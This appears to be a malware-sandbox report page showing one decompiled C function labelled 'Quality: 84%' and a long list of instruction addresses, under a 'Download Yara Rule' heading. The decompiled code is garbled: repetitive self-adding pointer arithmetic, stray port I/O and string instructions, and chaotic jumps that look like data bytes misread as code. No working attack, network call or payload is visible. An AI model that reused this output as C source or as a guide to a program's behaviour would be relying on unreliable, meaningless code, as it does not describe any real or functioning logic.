Download Yara Rule

C-Code - Quality: 84%

			E0126BA77(signed int __eax, void* __ebx, signed char __ecx, signed char __edx, signed char __edi, signed int __esi) {
				signed char _t119;
				signed char* _t120;
				signed char _t122;
				signed char _t123;
				signed char _t125;
				signed char _t126;
				signed char _t128;
				signed char _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t136;
				signed char _t137;
				signed char _t138;
				signed char _t139;
				signed char _t140;
				signed char _t141;
				signed int _t142;
				signed char _t143;
				signed char _t144;
				signed char _t145;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t150;
				signed char _t151;
				signed char _t152;
				signed char _t153;
				signed char _t154;
				signed char _t155;
				signed int _t156;
				signed char _t157;
				signed char _t158;
				signed char _t159;
				signed char _t160;
				signed char _t161;
				signed char _t162;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				signed char _t171;
				signed char _t174;
				signed char _t175;
				signed char _t176;
				signed char _t177;
				signed char _t180;
				signed char _t181;
				signed char _t184;
				signed char _t185;
				signed char _t188;
				signed char _t189;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed int _t198;
				signed char _t204;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t209;
				signed char _t210;
				signed char _t212;
				signed char _t213;
				signed char _t214;
				signed char _t216;
				signed char _t231;
				signed char _t232;
				void* _t234;
				void* _t235;
				void* _t236;
				signed char _t237;
				signed char _t238;
				void* _t240;
				void* _t241;
				signed char _t242;
				void* _t244;
				void* _t245;
				void* _t246;
				signed char _t250;
				signed char _t256;
				signed char _t260;
				signed char _t261;
				signed int _t262;
				signed int _t263;
				signed char* _t264;

				_t262 = __esi;
				_t261 = __edi;
				_t260 = __edx;
				_t256 = __ecx;
				_t119 = __eax |  *__eax;
				_t231 = __ebx +  *((intOrPtr*)(__ebx - 0x4f));
				 *_t119 =  *_t119 + _t119;
				_t120 = _t119 + 0x19;
				_pop(ds);
				if(_t120 >= 0) {
					L18:
					 *_t260 =  *_t260 + _t256;
					 *_t260 =  &(_t120[ *_t260]);
					__eflags =  *_t260;
					while(1) {
						L19:
						_t232 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
						__eflags = _t232;
						 *_t120 =  &(_t120[ *_t120]);
						asm("outsd");
						_t122 = _t263;
						_t263 =  &(_t120[0x16]);
						 *_t122 =  *_t122 + _t122;
						_t123 = _t122 |  *_t122;
						 *_t123 =  *_t123 + _t123;
						asm("outsd");
						_t125 = _t261;
						_t261 = _t123 + 0x17;
						 *_t125 =  *_t125 + _t125;
						_t126 = _t125 |  *_t125;
						_t234 = _t232 +  *((intOrPtr*)(_t232 - 0x4f)) +  *((intOrPtr*)(_t232 +  *((intOrPtr*)(_t232 - 0x4f)) - 0x4f));
						 *_t126 =  *_t126 + _t126;
						asm("cld");
						_t128 = _t126 + 0x20 +  *((intOrPtr*)(_t126 + 0x20));
						 *_t128 =  *_t128 + _t128;
						_t129 = _t260;
						_t260 = _t128;
						 *_t129 =  *_t129 + _t129;
						 *((intOrPtr*)(_t234 + 0x34)) =  *((intOrPtr*)(_t234 + 0x34)) + _t260;
						 *_t129 =  *_t129 + _t129;
						_t256 = _t256 |  *(_t261 + 0x35);
						 *_t129 =  *_t129 + _t129;
						_t130 = _t129 |  *_t129;
						_t231 = _t234 +  *((intOrPtr*)(_t234 - 0x4f));
						__eflags = _t231;
						L21:
						while(__eflags == 0) {
							 *_t130 =  *_t130 + _t130;
							_t130 = _t130 + 0x1b;
							asm("outsd");
							__eflags = _t130;
							 *_t260 =  *_t260 + _t256;
							 *_t260 =  *_t260 + _t130;
							__eflags =  *_t260;
							if( *_t260 != 0) {
								goto L15;
							} else {
								 *_t130 =  *_t130 + _t130;
								asm("outsd");
								_t136 = _t130 + 0x1b;
								__eflags = _t136;
								while(1) {
									 *_t136 =  *_t136 + _t136;
									_t137 = _t136 |  *_t136;
									_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
									 *_t137 =  *_t137 + _t137;
									_t120 = _t137 + 0x17;
									asm("outsd");
									__eflags =  *_t120 - _t120;
									 *_t260 =  *_t260 + _t256;
									 *_t260 =  &(_t120[ *_t260]);
									__eflags =  *_t260;
									if( *_t260 != 0) {
										goto L19;
									}
									 *_t120 =  &(_t120[ *_t120]);
									_t138 =  &(_t120[0x1f]);
									asm("adc [edi+0x73], ch");
									 *_t138 =  *_t138 + _t138;
									_t139 = _t138 |  *_t138;
									_t237 = _t231 +  *((intOrPtr*)(_t231 - 0x5f));
									__eflags = _t237;
									while(1) {
										 *_t139 =  *_t139 + _t139;
										_t140 = _t139 + 0x20;
										asm("movsd");
										 *_t140 =  *_t140 + _t140;
										 *_t256 =  *_t256 + _t237;
										__eflags =  *_t256;
										if(__eflags >= 0) {
											goto L32;
										}
										L27:
										 *_t140 =  *_t140 + _t140;
										_t256 = _t256 |  *(_t261 + 0x32);
										 *_t140 =  *_t140 + _t140;
										_t216 = _t140 |  *_t140;
										_t231 = _t237 +  *((intOrPtr*)(_t237 - 0x5f));
										 *_t216 =  *_t216 + _t216;
										_t136 = _t216 + 0x72;
										asm("int 0x19");
										_t41 = _t136 + 0x6f;
										 *_t41 =  *(_t136 + 0x6f) + _t260;
										__eflags =  *_t41;
										if(__eflags < 0) {
											 *_t260 =  *_t260 + _t256;
											 *_t260 =  *_t260 + _t136;
											__eflags =  *_t260;
											if( *_t260 != 0) {
												goto L31;
											} else {
												 *_t136 =  *_t136 + _t136;
												asm("outsd");
												_t142 = _t136 + 0x1b;
												 *_t142 =  *_t142 + _t142;
												__eflags =  *_t142;
												L46:
												 *_t260 =  *_t260 + _t256;
												 *_t260 =  *_t260 + _t142;
												__eflags =  *_t260;
												if(__eflags != 0) {
													if(__eflags >= 0) {
														goto L41;
													} else {
														 *_t142 =  *_t142 + _t142;
														_t256 = _t256 |  *(_t261 + 0x35);
														 *_t142 =  *_t142 + _t142;
														_t237 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
														__eflags = _t237;
														goto L36;
													}
												} else {
													 *_t142 =  *_t142 + _t142;
													_t150 = _t142 + 0x17;
													asm("outsd");
													__eflags =  *_t150 - _t150;
													 *_t260 =  *_t260 + _t256;
													 *_t260 =  *_t260 + _t150;
													__eflags =  *_t260;
													if( *_t260 != 0) {
														L36:
														_t139 =  *0x18040000;
														asm("outsd");
														__eflags = _t139;
														 *_t260 =  *_t260 + _t256;
														 *_t260 =  *_t260 + _t139;
														__eflags =  *_t260;
														if( *_t260 != 0) {
															 *_t139 =  *_t139 + _t139;
															_t140 = _t139 + 0x20;
															asm("movsd");
															 *_t140 =  *_t140 + _t140;
															 *_t256 =  *_t256 + _t237;
															__eflags =  *_t256;
															if(__eflags >= 0) {
																goto L32;
															}
														} else {
															 *_t139 =  *_t139 + _t139;
															_t144 = _t139 + 0x72;
															__eflags = _t144;
															asm("in eax, dx");
															asm("sbb [eax], al");
															if(_t144 < 0) {
																goto L52;
															} else {
																__eflags = _t144 - 0xa0000;
																goto L39;
															}
														}
													} else {
														 *_t150 =  *_t150 + _t150;
														_t143 = _t150 + 0x20;
														__eflags =  *_t143 & 0x00000000;
														 *_t261 =  *_t261 + _t238;
														_t51 = _t238 + 0x31;
														 *_t51 =  *(_t238 + 0x31) | _t262;
														__eflags =  *_t51;
														 *_t143 =  *_t143 ^ _t143;
														 *_t260 =  *_t260 + _t256;
														asm("outsd");
														_t144 = _t143 ^  *_t143;
														 *_t260 =  *_t260 + _t256;
														 *_t260 =  *_t260 + _t144;
														__eflags =  *_t260;
														if( *_t260 != 0) {
															L39:
															 *_t144 =  *_t144 + _t144;
															_t145 = _t144 |  *_t144;
															_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
															 *_t145 =  *_t145 + _t145;
															_t142 = _t145 + 0x17;
															__eflags = _t142;
															asm("outsd");
															if (_t142 <= 0) goto L40;
															 *_t260 =  *_t260 + _t256;
															 *_t260 =  *_t260 + _t142;
															__eflags =  *_t260;
															L41:
															_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5f));
															__eflags = _t231;
														} else {
															 *_t144 =  *_t144 + _t144;
															_t146 = _t144 + 0x72;
															__eflags = _t146;
															asm("out dx, eax");
															asm("sbb [eax], eax");
															if(_t146 < 0) {
																L64:
																_t147 = _t146 + 0x17;
																asm("outsd");
																__eflags =  *_t147 - _t147;
																 *_t260 =  *_t260 + _t256;
																 *_t260 =  *_t260 + _t147;
																__eflags =  *_t260;
																if( *_t260 != 0) {
																	 *_t147 =  *_t147 + _t147;
																	_t142 = _t147 + 0x19;
																	asm("outsd");
																	__eflags = _t142;
																	 *_t260 =  *_t260 + _t256;
																	 *_t260 =  *_t260 + _t142;
																	__eflags =  *_t260;
																	if( *_t260 != 0) {
																		goto L46;
																	} else {
																		 *_t142 =  *_t142 + _t142;
																		__eflags =  *_t142;
																		goto L56;
																	}
																} else {
																	 *_t147 =  *_t147 + _t147;
																	_t151 = _t147 + 0x1f;
																	asm("adc [edi+0x73], ch");
																	 *_t151 =  *_t151 + _t151;
																	_t142 = _t151 |  *_t151;
																	_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																	__eflags = _t231;
																	L66:
																	if(__eflags != 0) {
																		L56:
																		 *(_t260 + _t262 * 2) =  *(_t260 + _t262 * 2) + _t142;
																		_t136 = _t256;
																		_t256 = _t142;
																		asm("sbb [eax], eax");
																		_t60 = _t136 + 0x6f;
																		 *_t60 =  *(_t136 + 0x6f) + _t260;
																		__eflags =  *_t60;
																	} else {
																		 *_t142 =  *_t142 + _t142;
																		_t152 = _t142 + 0x19;
																		asm("sbb [ebx+0x31], esi");
																		 *_t152 =  *_t152 + _t152;
																		_t256 = _t256 |  *(_t261 + 0x32);
																		 *_t152 =  *_t152 + _t152;
																		_t153 = _t152 |  *_t152;
																		_t238 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
																		 *_t153 =  *_t153 + _t153;
																		_t154 = _t153 + 0x72;
																		asm("adc [edx], ebx");
																		_t69 = _t154 + 0x6f;
																		 *_t69 =  *(_t154 + 0x6f) + _t260;
																		__eflags =  *_t69;
																		if(__eflags < 0) {
																			 *_t260 =  *_t260 + _t256;
																			 *_t260 =  *_t260 + _t154;
																			__eflags =  *_t260;
																			if( *_t260 != 0) {
																				goto L71;
																			} else {
																				 *_t154 =  *_t154 + _t154;
																				asm("outsd");
																				_t212 = _t154 + 0x1b;
																				 *_t212 =  *_t212 + _t212;
																				_t160 = _t212 |  *_t212;
																				_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																				__eflags = _t231;
																				goto L83;
																			}
																		} else {
																			_t156 = _t154 ^  *_t154;
																			 *_t260 =  *_t260 + _t256;
																			 *_t260 =  *_t260 + _t156;
																			__eflags =  *_t260;
																			if( *_t260 != 0) {
																				 *_t156 =  *_t156 + _t156;
																				__eflags =  *_t156;
																				_push(es);
																				if( *_t156 >= 0) {
																					goto L73;
																				} else {
																					 *_t156 =  *_t156 + _t156;
																					_t256 = _t256 |  *(_t261 + 0x3c);
																					 *_t156 =  *_t156 + _t156;
																					_t213 = _t156 |  *_t156;
																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t213 =  *_t213 + _t213;
																					_t154 = _t213 + 0x1a;
																					__eflags = _t154;
																					goto L63;
																				}
																			} else {
																				 *_t156 =  *_t156 + _t156;
																				_t214 = _t156 + 0x18;
																				asm("sbb [esi], edx");
																				asm("sbb [ebx+0x3a], esi");
																				 *_t214 =  *_t214 + _t214;
																				_t256 = _t256 |  *(_t261 + 0x3b);
																				 *_t214 =  *_t214 + _t214;
																				_t154 = _t214 |  *_t214;
																				__eflags = _t154;
																				L71:
																				 *_t260 =  *_t260 + _t154;
																				__eflags =  *_t260;
																				if( *_t260 != 0) {
																					L63:
																					asm("outsd");
																					_t155 = _t154 + 1;
																					 *_t155 =  *_t155 + _t155;
																					_t146 = _t155 |  *_t155;
																					_t238 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t146 =  *_t146 + _t146;
																					__eflags =  *_t146;
																					goto L64;
																				} else {
																					 *_t154 =  *_t154 + _t154;
																					_t156 = _t154 + 0x1f;
																					_t238 = _t238 - 1;
																					_pop(ds);
																					asm("sbb eax, 0x3473");
																					L73:
																					 *_t260 =  *_t260 + _t256;
																					asm("outsd");
																					_t142 = _t156 ^ 0x000a0000;
																					_t231 = _t238 +  *((intOrPtr*)(_t238 - 0x5d));
																					 *_t142 =  *_t142 + _t142;
																					__eflags =  *_t142;
																					L74:
																					 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t142;
																					asm("outsd");
																					__eflags = _t142;
																					 *_t260 =  *_t260 + _t256;
																					 *_t260 =  *_t260 + _t142;
																					__eflags =  *_t260;
																					if(__eflags != 0) {
																						goto L66;
																					} else {
																						 *_t142 =  *_t142 + _t142;
																						_t157 = _t142 + 0x72;
																						__eflags = _t157;
																						asm("aaa");
																						asm("sbb [eax], eax");
																						if(_t157 < 0) {
																							L88:
																							asm("sbb [ecx], bl");
																							asm("sbb [ebx+0x3a], esi");
																							 *_t157 =  *_t157 + _t157;
																							 *_t157 =  *_t157 + _t157;
																							_t158 = _t157 |  *_t157;
																							 *_t158 =  *_t158 + _t158;
																							_t159 = _t158 + 0x1f;
																							_t231 = _t231 +  *((intOrPtr*)(_t231 - 0x5c)) - 1;
																							ds = ss;
																							asm("sbb eax, 0x3473");
																							_t256 = _t256 |  *(_t261 + 0x3b) |  *(_t261 + 0x35);
																							 *_t159 =  *_t159 + _t159;
																							_t160 = _t159 |  *_t159;
																							__eflags = _t160;
																							L89:
																							 *_t260 =  *_t260 + _t160;
																							__eflags =  *_t260;
																							if( *_t260 != 0) {
																								L83:
																								 *_t160 =  *_t160 + _t160;
																								_t142 = _t160 + 0x17;
																								asm("outsd");
																								__eflags =  *_t142 - _t142;
																								 *_t260 =  *_t260 + _t256;
																								 *_t260 =  *_t260 + _t142;
																								__eflags =  *_t260;
																								if( *_t260 != 0) {
																									goto L74;
																								} else {
																									goto L84;
																								}
																							} else {
																								 *_t160 =  *_t160 + _t160;
																								__eflags =  *_t160;
																								L91:
																								_t85 = _t262 + _t260;
																								 *_t85 =  *(_t262 + _t260) + _t160;
																								__eflags =  *_t85;
																								_t142 = _t160 + 0x16;
																								asm("outsd");
																								__eflags = _t142;
																								 *_t260 =  *_t260 + _t256;
																								 *_t260 =  *_t260 + _t142;
																								__eflags =  *_t260;
																								if( *_t260 != 0) {
																									L84:
																									 *_t142 =  *_t142 + _t142;
																									_t161 = _t142 + 0x1f;
																									_push(_t264);
																									asm("sbb [ebx+0x31], esi");
																									 *_t161 =  *_t161 + _t161;
																									_t256 = _t256 |  *(_t261 + 0x32);
																									 *_t161 =  *_t161 + _t161;
																									_t162 = _t161 |  *_t161;
																									_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																									 *_t162 =  *_t162 + _t162;
																									_t165 = _t162 + 0x00000072 - 0x6f70001a ^  *(_t162 + 0x72 - 0x6f70001a);
																									__eflags = _t165;
																									goto L85;
																								} else {
																									 *_t142 =  *_t142 + _t142;
																									_t167 = _t142 + 0x72;
																									__eflags = _t167;
																									asm("popad");
																									asm("sbb [eax], eax");
																									if(_t167 < 0) {
																										L105:
																										 *_t167 =  *_t167 + _t167;
																										_t168 = _t167 |  *_t167;
																										_t242 = _t238 +  *((intOrPtr*)(_t238 - 0x6b));
																										__eflags = _t242;
																									} else {
																										__eflags = _t167 - 0xa0000;
																										_t241 = _t238 +  *((intOrPtr*)(_t238 - 0x5c));
																										 *_t167 =  *_t167 + _t167;
																										_t165 = _t167 + 0x17;
																										__eflags = _t165;
																										_pop(ss);
																										asm("outsd");
																										if (__eflags <= 0) goto L96;
																										 *_t260 =  *_t260 + _t256;
																										 *_t260 =  *_t260 + _t165;
																										__eflags =  *_t260;
																										if( *_t260 != 0) {
																											L85:
																											 *_t165 =  *_t165 + _t165;
																											_t166 = _t165 |  *_t165;
																											_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x5c));
																											__eflags = _t231;
																										} else {
																											 *_t165 =  *_t165 + _t165;
																											 *_t262 =  *_t262 + 1;
																											_t166 = _t165 + 0x00000002 | 0x73060001;
																											__eflags = _t166;
																											if (_t166 > 0) goto L98;
																											 *_t260 =  *_t260 + _t256;
																											__eflags =  *_t260;
																											asm("outsd");
																											if ( *_t260 < 0) goto L99;
																											 *_t260 =  *_t260 + _t256;
																											 *_t260 =  *_t260 + _t166;
																											__eflags =  *_t260;
																											if( *_t260 != 0) {
																												_t157 = _t166 + 0x18;
																												__eflags = _t157;
																												goto L88;
																											} else {
																												 *_t166 =  *_t166 + _t166;
																												_t204 = _t166 + 0x6f;
																												_t256 = _t256 + 1;
																												 *_t204 =  *_t204 + _t204;
																												_t160 = _t204 |  *_t260;
																												__eflags = _t160;
																												if(_t160 != 0) {
																													goto L91;
																												} else {
																													 *_t160 =  *_t160 + _t160;
																													_t205 = _t160 + 0x6f;
																													_t260 = _t260 + 1;
																													 *_t205 =  *_t205 + _t205;
																													_t206 = _t205 |  *_t205;
																													_t231 = _t241 +  *((intOrPtr*)(_t241 - 0x6b));
																													 *_t206 =  *_t206 + _t206;
																													__eflags =  *_t206;
																													 *((intOrPtr*)(_t261 + _t260)) =  *((intOrPtr*)(_t261 + _t260)) + _t206;
																													asm("outsd");
																													_t160 = _t206 ^  *_t256;
																													 *_t260 =  *_t260 + _t256;
																													 *_t260 =  *_t260 + _t160;
																													__eflags =  *_t260;
																													if( *_t260 != 0) {
																														goto L89;
																													} else {
																														 *_t160 =  *_t160 + _t160;
																														_t207 = _t160 + 0x1a;
																														_pop(ds);
																														 *(_t231 + 0x31) =  *(_t231 + 0x31) & _t262;
																														 *_t207 =  *_t207 + _t207;
																														_t256 = _t256 |  *(_t261 + 0x33);
																														 *_t207 =  *_t207 + _t207;
																														_t208 = _t207 |  *_t207;
																														 *_t208 =  *_t208 + _t208;
																														_t198 = _t208 + 0x72;
																														_t250 = _t231 +  *((intOrPtr*)(_t231 - 0x6b)) + 1;
																														__eflags = _t250;
																														asm("adc [eax], al");
																														if(_t250 < 0) {
																															_t174 = _t198 + 0x6f;
																															__eflags = _t174;
																															_push(0x730a0000);
																															if (_t174 != 0) goto L112;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t245 = _t250 +  *[es:ebx-0x4d];
																															 *_t174 =  *_t174 + _t174;
																															__eflags =  *_t174;
																															L113:
																															_t108 = _t261 + _t263 * 2;
																															 *_t108 =  *(_t261 + _t263 * 2) + _t174;
																															__eflags =  *_t108;
																															_push(0x730a0000);
																															if ( *_t108 != 0) goto L114;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t246 = _t245 +  *[es:ebx-0x4d];
																															 *_t174 =  *_t174 + _t174;
																															_t175 = _t174 + 0x6f;
																															__eflags = _t175;
																															_push(0x730a0000);
																															L115:
																															 *_t175 =  *_t175 + _t175;
																															_t260 = _t260 |  *(_t246 + 0x7a);
																															 *_t175 =  *_t175 + _t175;
																															__eflags =  *_t175;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t244 = _t246 +  *[es:ebx-0x4d];
																															 *_t175 =  *_t175 + _t175;
																															_t171 = _t175 + 0x6f;
																															__eflags = _t171;
																															_push(0x730a0000);
																															L117:
																															if (__eflags != 0) goto L118;
																															 *_t260 =  *_t260 + _t256;
																															asm("outsd");
																															_push(0);
																															 *_t260 =  *_t260 + _t256;
																															_t245 = _t244 +  *[es:ebx-0x4d];
																															 *_t171 =  *_t171 + _t171;
																															_t174 =  *(_t171 + 0x6f) * 0x00000000 |  *_t260;
																															__eflags = _t174;
																															if(_t174 != 0) {
																																goto L113;
																															}
																															 *_t174 =  *_t174 + _t174;
																															__eflags =  *_t174;
																															while(1) {
																																L120:
																																_t176 = _t174 + 0x16;
																																_pop(ss);
																																asm("outsd");
																																asm("insb");
																																 *_t176 =  *_t176 + _t176;
																																_t177 = _t176 |  *_t176;
																																_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
																																 *_t177 =  *_t177 + _t177;
																																_t175 =  *(_t177 + 0x6f) * 0x00000000 |  *_t260;
																																__eflags = _t175;
																																if(_t175 != 0) {
																																	goto L115;
																																}
																																 *_t175 =  *_t175 + _t175;
																																_t180 = _t175 + 0x18;
																																__eflags = _t180;
																																while(1) {
																																	asm("sbb [esi], dl");
																																	asm("outsd");
																																	asm("insb");
																																	 *_t180 =  *_t180 + _t180;
																																	_t181 = _t180 |  *_t180;
																																	_t244 = _t246 +  *((intOrPtr*)(_t246 - 0x4d));
																																	 *_t181 =  *_t181 + _t181;
																																	_t171 =  *(_t181 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t171;
																																	if(__eflags != 0) {
																																		goto L117;
																																	}
																																	 *_t171 =  *_t171 + _t171;
																																	_t184 = _t171 + 0x19;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t184 =  *_t184 + _t184;
																																	_t185 = _t184 |  *_t184;
																																	_t245 = _t244 +  *((intOrPtr*)(_t244 - 0x4d));
																																	 *_t185 =  *_t185 + _t185;
																																	_t174 =  *(_t185 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t174;
																																	if(_t174 != 0) {
																																		goto L120;
																																	}
																																	 *_t174 =  *_t174 + _t174;
																																	_t188 = _t174 + 0x16;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t188 =  *_t188 + _t188;
																																	_t189 = _t188 |  *_t188;
																																	__eflags = _t189;
																																	_t246 = _t245 +  *((intOrPtr*)(_t245 - 0x4d));
																																	 *_t189 =  *_t189 + _t189;
																																	_t180 =  *(_t189 + 0x6f) * 0x00000000 |  *_t260;
																																	__eflags = _t180;
																																	if(_t180 != 0) {
																																		continue;
																																	}
																																	 *_t180 =  *_t180 + _t180;
																																	_t192 = _t180 + 0x17;
																																	_push(ss);
																																	asm("outsd");
																																	asm("insb");
																																	 *_t192 =  *_t192 + _t192;
																																	_t193 = _t192 |  *_t192;
																																	 *_t193 =  *_t193 + _t193;
																																	_t194 = _t193 + 0x1b;
																																	__eflags = _t194;
																																	asm("outsd");
																																	return _t194;
																																	goto L127;
																																}
																																goto L117;
																															}
																															goto L115;
																														} else {
																															_t167 = _t198 ^  *_t198;
																															__eflags = _t167;
																															goto L105;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags = _t157 - 0xa0000;
																							_t240 = _t231 +  *((intOrPtr*)(_t231 - 0x5d));
																							 *_t157 =  *_t157 + _t157;
																							_t209 = _t157 + 0x17;
																							__eflags = _t209;
																							asm("outsd");
																							if (_t209 <= 0) goto L77;
																							 *_t260 =  *_t260 + _t256;
																							__eflags =  *_t260;
																							_t210 = _t209 |  *_t209;
																							_t238 = _t240 +  *((intOrPtr*)(_t240 - 0x5d));
																							__eflags = _t238;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t142 = _t146 ^  *_t146;
																 *_t260 =  *_t260 + _t256;
																 *_t260 =  *_t260 + _t142;
																__eflags =  *_t260;
																if ( *_t260 != 0) goto L41;
																L52:
																 *0x1f040000 = _t144;
															}
														}
													}
												}
											}
										} else {
											_t130 = _t136 ^  *_t136;
											 *_t260 =  *_t260 + _t256;
											 *_t260 =  *_t260 + _t130;
											__eflags =  *_t260;
											if(__eflags != 0) {
												goto L21;
											} else {
												 *_t130 =  *_t130 + _t130;
												_t136 = _t130 + 0x18;
												asm("sbb [esi], edx");
												asm("sbb [ebx+0x3a], esi");
												 *_t136 =  *_t136 + _t136;
												_t256 = _t256 |  *(_t261 + 0x3b);
												 *_t136 =  *_t136 + _t136;
												__eflags =  *_t136;
												L31:
												 *_t260 =  *_t260 + _t256;
												 *_t260 =  *_t260 + _t136;
												__eflags =  *_t260;
												if (__eflags != 0) goto L24;
												goto L32;
											}
										}
										goto L127;
										L32:
										_t141 =  *0x1f040000;
									}
								}
								goto L19;
							}
							goto L127;
						}
						goto L16;
					}
					_t236 = _t235 +  *((intOrPtr*)(_t235 - 0x4f));
				} else {
					 *__eax =  *__eax + __al;
					__ch = __ch |  *(__edi + 0x32);
					 *__eax =  *__eax + __al;
					__al = __al |  *__eax;
					__bh = __bh +  *((intOrPtr*)(__ebx - 0x4f));
					 *__eax =  *__eax + __al;
					__al = __al + 0x16;
					asm("outsd");
					_t17 = __eax;
					__eax = __ebx;
					__ebx = _t17;
					 *__eax =  *__eax + __al;
					__al = __al |  *__eax;
					__bh = __bh +  *((intOrPtr*)(_t17 - 0x4f));
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					L15:
					_t19 = _t260 + _t262 * 2;
					 *_t19 =  *(_t260 + _t262 * 2) + _t130;
					__eflags =  *_t19;
					L16:
					_t131 =  *_t261;
					 *_t261 = _t130;
					 *((intOrPtr*)(_t131 + 0x6f)) =  *((intOrPtr*)(_t131 + 0x6f)) + _t260;
					_t132 = _t131 ^  *_t131;
					 *_t260 =  *_t260 + _t256;
					 *_t260 =  *_t260 + _t132;
					__eflags =  *_t260;
					if( *_t260 != 0) {
						_t235 = _t231 +  *((intOrPtr*)(_t231 - 0x4f));
					} else {
						 *_t132 =  *_t132 + _t132;
						asm("outsd");
						_t120 = _t264;
						_t264 = _t132 + 0x17;
						 *_t120 =  &(_t120[ *_t120]);
						__eflags =  *_t120;
						goto L18;
					}
				}
				L127:
			}

0x0126ba77
0x0126ba77
0x0126ba77
0x0126ba77
0x0126ba77
0x0126ba79
0x0126ba7c
0x0126ba7e
0x0126ba80
0x0126ba81
0x0126bab5
0x0126bab5
0x0126bab7
0x0126bab7
0x0126bab8
0x0126bab8
0x0126bab8
0x0126bab8
0x0126babb
0x0126babf
0x0126bac0
0x0126bac0
0x0126bac1
0x0126bac3
0x0126bac8
0x0126bacc
0x0126bacd
0x0126bacd
0x0126bace
0x0126bad0
0x0126bad2
0x0126bad5
0x0126bad9
0x0126bada
0x0126badc
0x0126bade
0x0126bade
0x0126badf
0x0126bae1
0x0126bae4
0x0126bae6
0x0126bae9
0x0126baeb
0x0126baed
0x0126baed
0x00000000
0x0126baee
0x0126baf0
0x0126baf2
0x0126baf4
0x0126baf5
0x0126baf7
0x0126baf9
0x0126baf9
0x0126bafb
0x00000000
0x0126bafd
0x0126bafd
0x0126bb01
0x0126bb02
0x0126bb02
0x0126bb03
0x0126bb03
0x0126bb05
0x0126bb07
0x0126bb0a
0x0126bb0c
0x0126bb0e
0x0126bb0f
0x0126bb11
0x0126bb13
0x0126bb13
0x0126bb15
0x00000000
0x00000000
0x0126bb17
0x0126bb19
0x0126bb1b
0x0126bb1e
0x0126bb20
0x0126bb22
0x0126bb22
0x0126bb25
0x0126bb25
0x0126bb27
0x0126bb29
0x0126bb2a
0x0126bb2c
0x0126bb2c
0x0126bb2e
0x00000000
0x00000000
0x0126bb30
0x0126bb30
0x0126bb32
0x0126bb35
0x0126bb37
0x0126bb39
0x0126bb3c
0x0126bb3e
0x0126bb40
0x0126bb42
0x0126bb42
0x0126bb42
0x0126bb43
0x0126bbb4
0x0126bbb6
0x0126bbb6
0x0126bbb8
0x00000000
0x0126bbba
0x0126bbba
0x0126bbbe
0x0126bbbf
0x0126bbc0
0x0126bbc0
0x0126bbc1
0x0126bbc1
0x0126bbc3
0x0126bbc3
0x0126bbc5
0x0126bb69
0x00000000
0x0126bb6b
0x0126bb6b
0x0126bb6d
0x0126bb70
0x0126bb74
0x0126bb74
0x00000000
0x0126bb74
0x0126bbc7
0x0126bbc7
0x0126bbc9
0x0126bbcb
0x0126bbcc
0x0126bbce
0x0126bbd0
0x0126bbd0
0x0126bbd2
0x0126bb76
0x0126bb76
0x0126bb7b
0x0126bb7c
0x0126bb7e
0x0126bb80
0x0126bb80
0x0126bb82
0x0126bb25
0x0126bb27
0x0126bb29
0x0126bb2a
0x0126bb2c
0x0126bb2c
0x0126bb2e
0x00000000
0x00000000
0x0126bb84
0x0126bb84
0x0126bb86
0x0126bb86
0x0126bb88
0x0126bb89
0x0126bb8b
0x00000000
0x0126bb8d
0x0126bb8d
0x00000000
0x0126bb8d
0x0126bb8b
0x0126bbd4
0x0126bbd4
0x0126bbd6
0x0126bbd8
0x0126bbdb
0x0126bbdd
0x0126bbdd
0x0126bbdd
0x0126bbdf
0x0126bbe1
0x0126bbe3
0x0126bbe4
0x0126bbe6
0x0126bbe8
0x0126bbe8
0x0126bbea
0x0126bb8e
0x0126bb8e
0x0126bb90
0x0126bb92
0x0126bb95
0x0126bb97
0x0126bb97
0x0126bb99
0x0126bb9a
0x0126bb9c
0x0126bb9e
0x0126bb9e
0x0126bb9f
0x0126bb9f
0x0126bb9f
0x0126bbec
0x0126bbec
0x0126bbee
0x0126bbee
0x0126bbf0
0x0126bbf1
0x0126bbf3
0x0126bc64
0x0126bc64
0x0126bc66
0x0126bc67
0x0126bc69
0x0126bc6b
0x0126bc6b
0x0126bc6d
0x0126bc12
0x0126bc14
0x0126bc16
0x0126bc17
0x0126bc19
0x0126bc1b
0x0126bc1b
0x0126bc1d
0x00000000
0x0126bc1f
0x0126bc1f
0x0126bc1f
0x00000000
0x0126bc1f
0x0126bc6f
0x0126bc6f
0x0126bc71
0x0126bc73
0x0126bc76
0x0126bc78
0x0126bc7a
0x0126bc7a
0x0126bc7b
0x0126bc7b
0x0126bc20
0x0126bc20
0x0126bc23
0x0126bc23
0x0126bc24
0x0126bc25
0x0126bc25
0x0126bc25
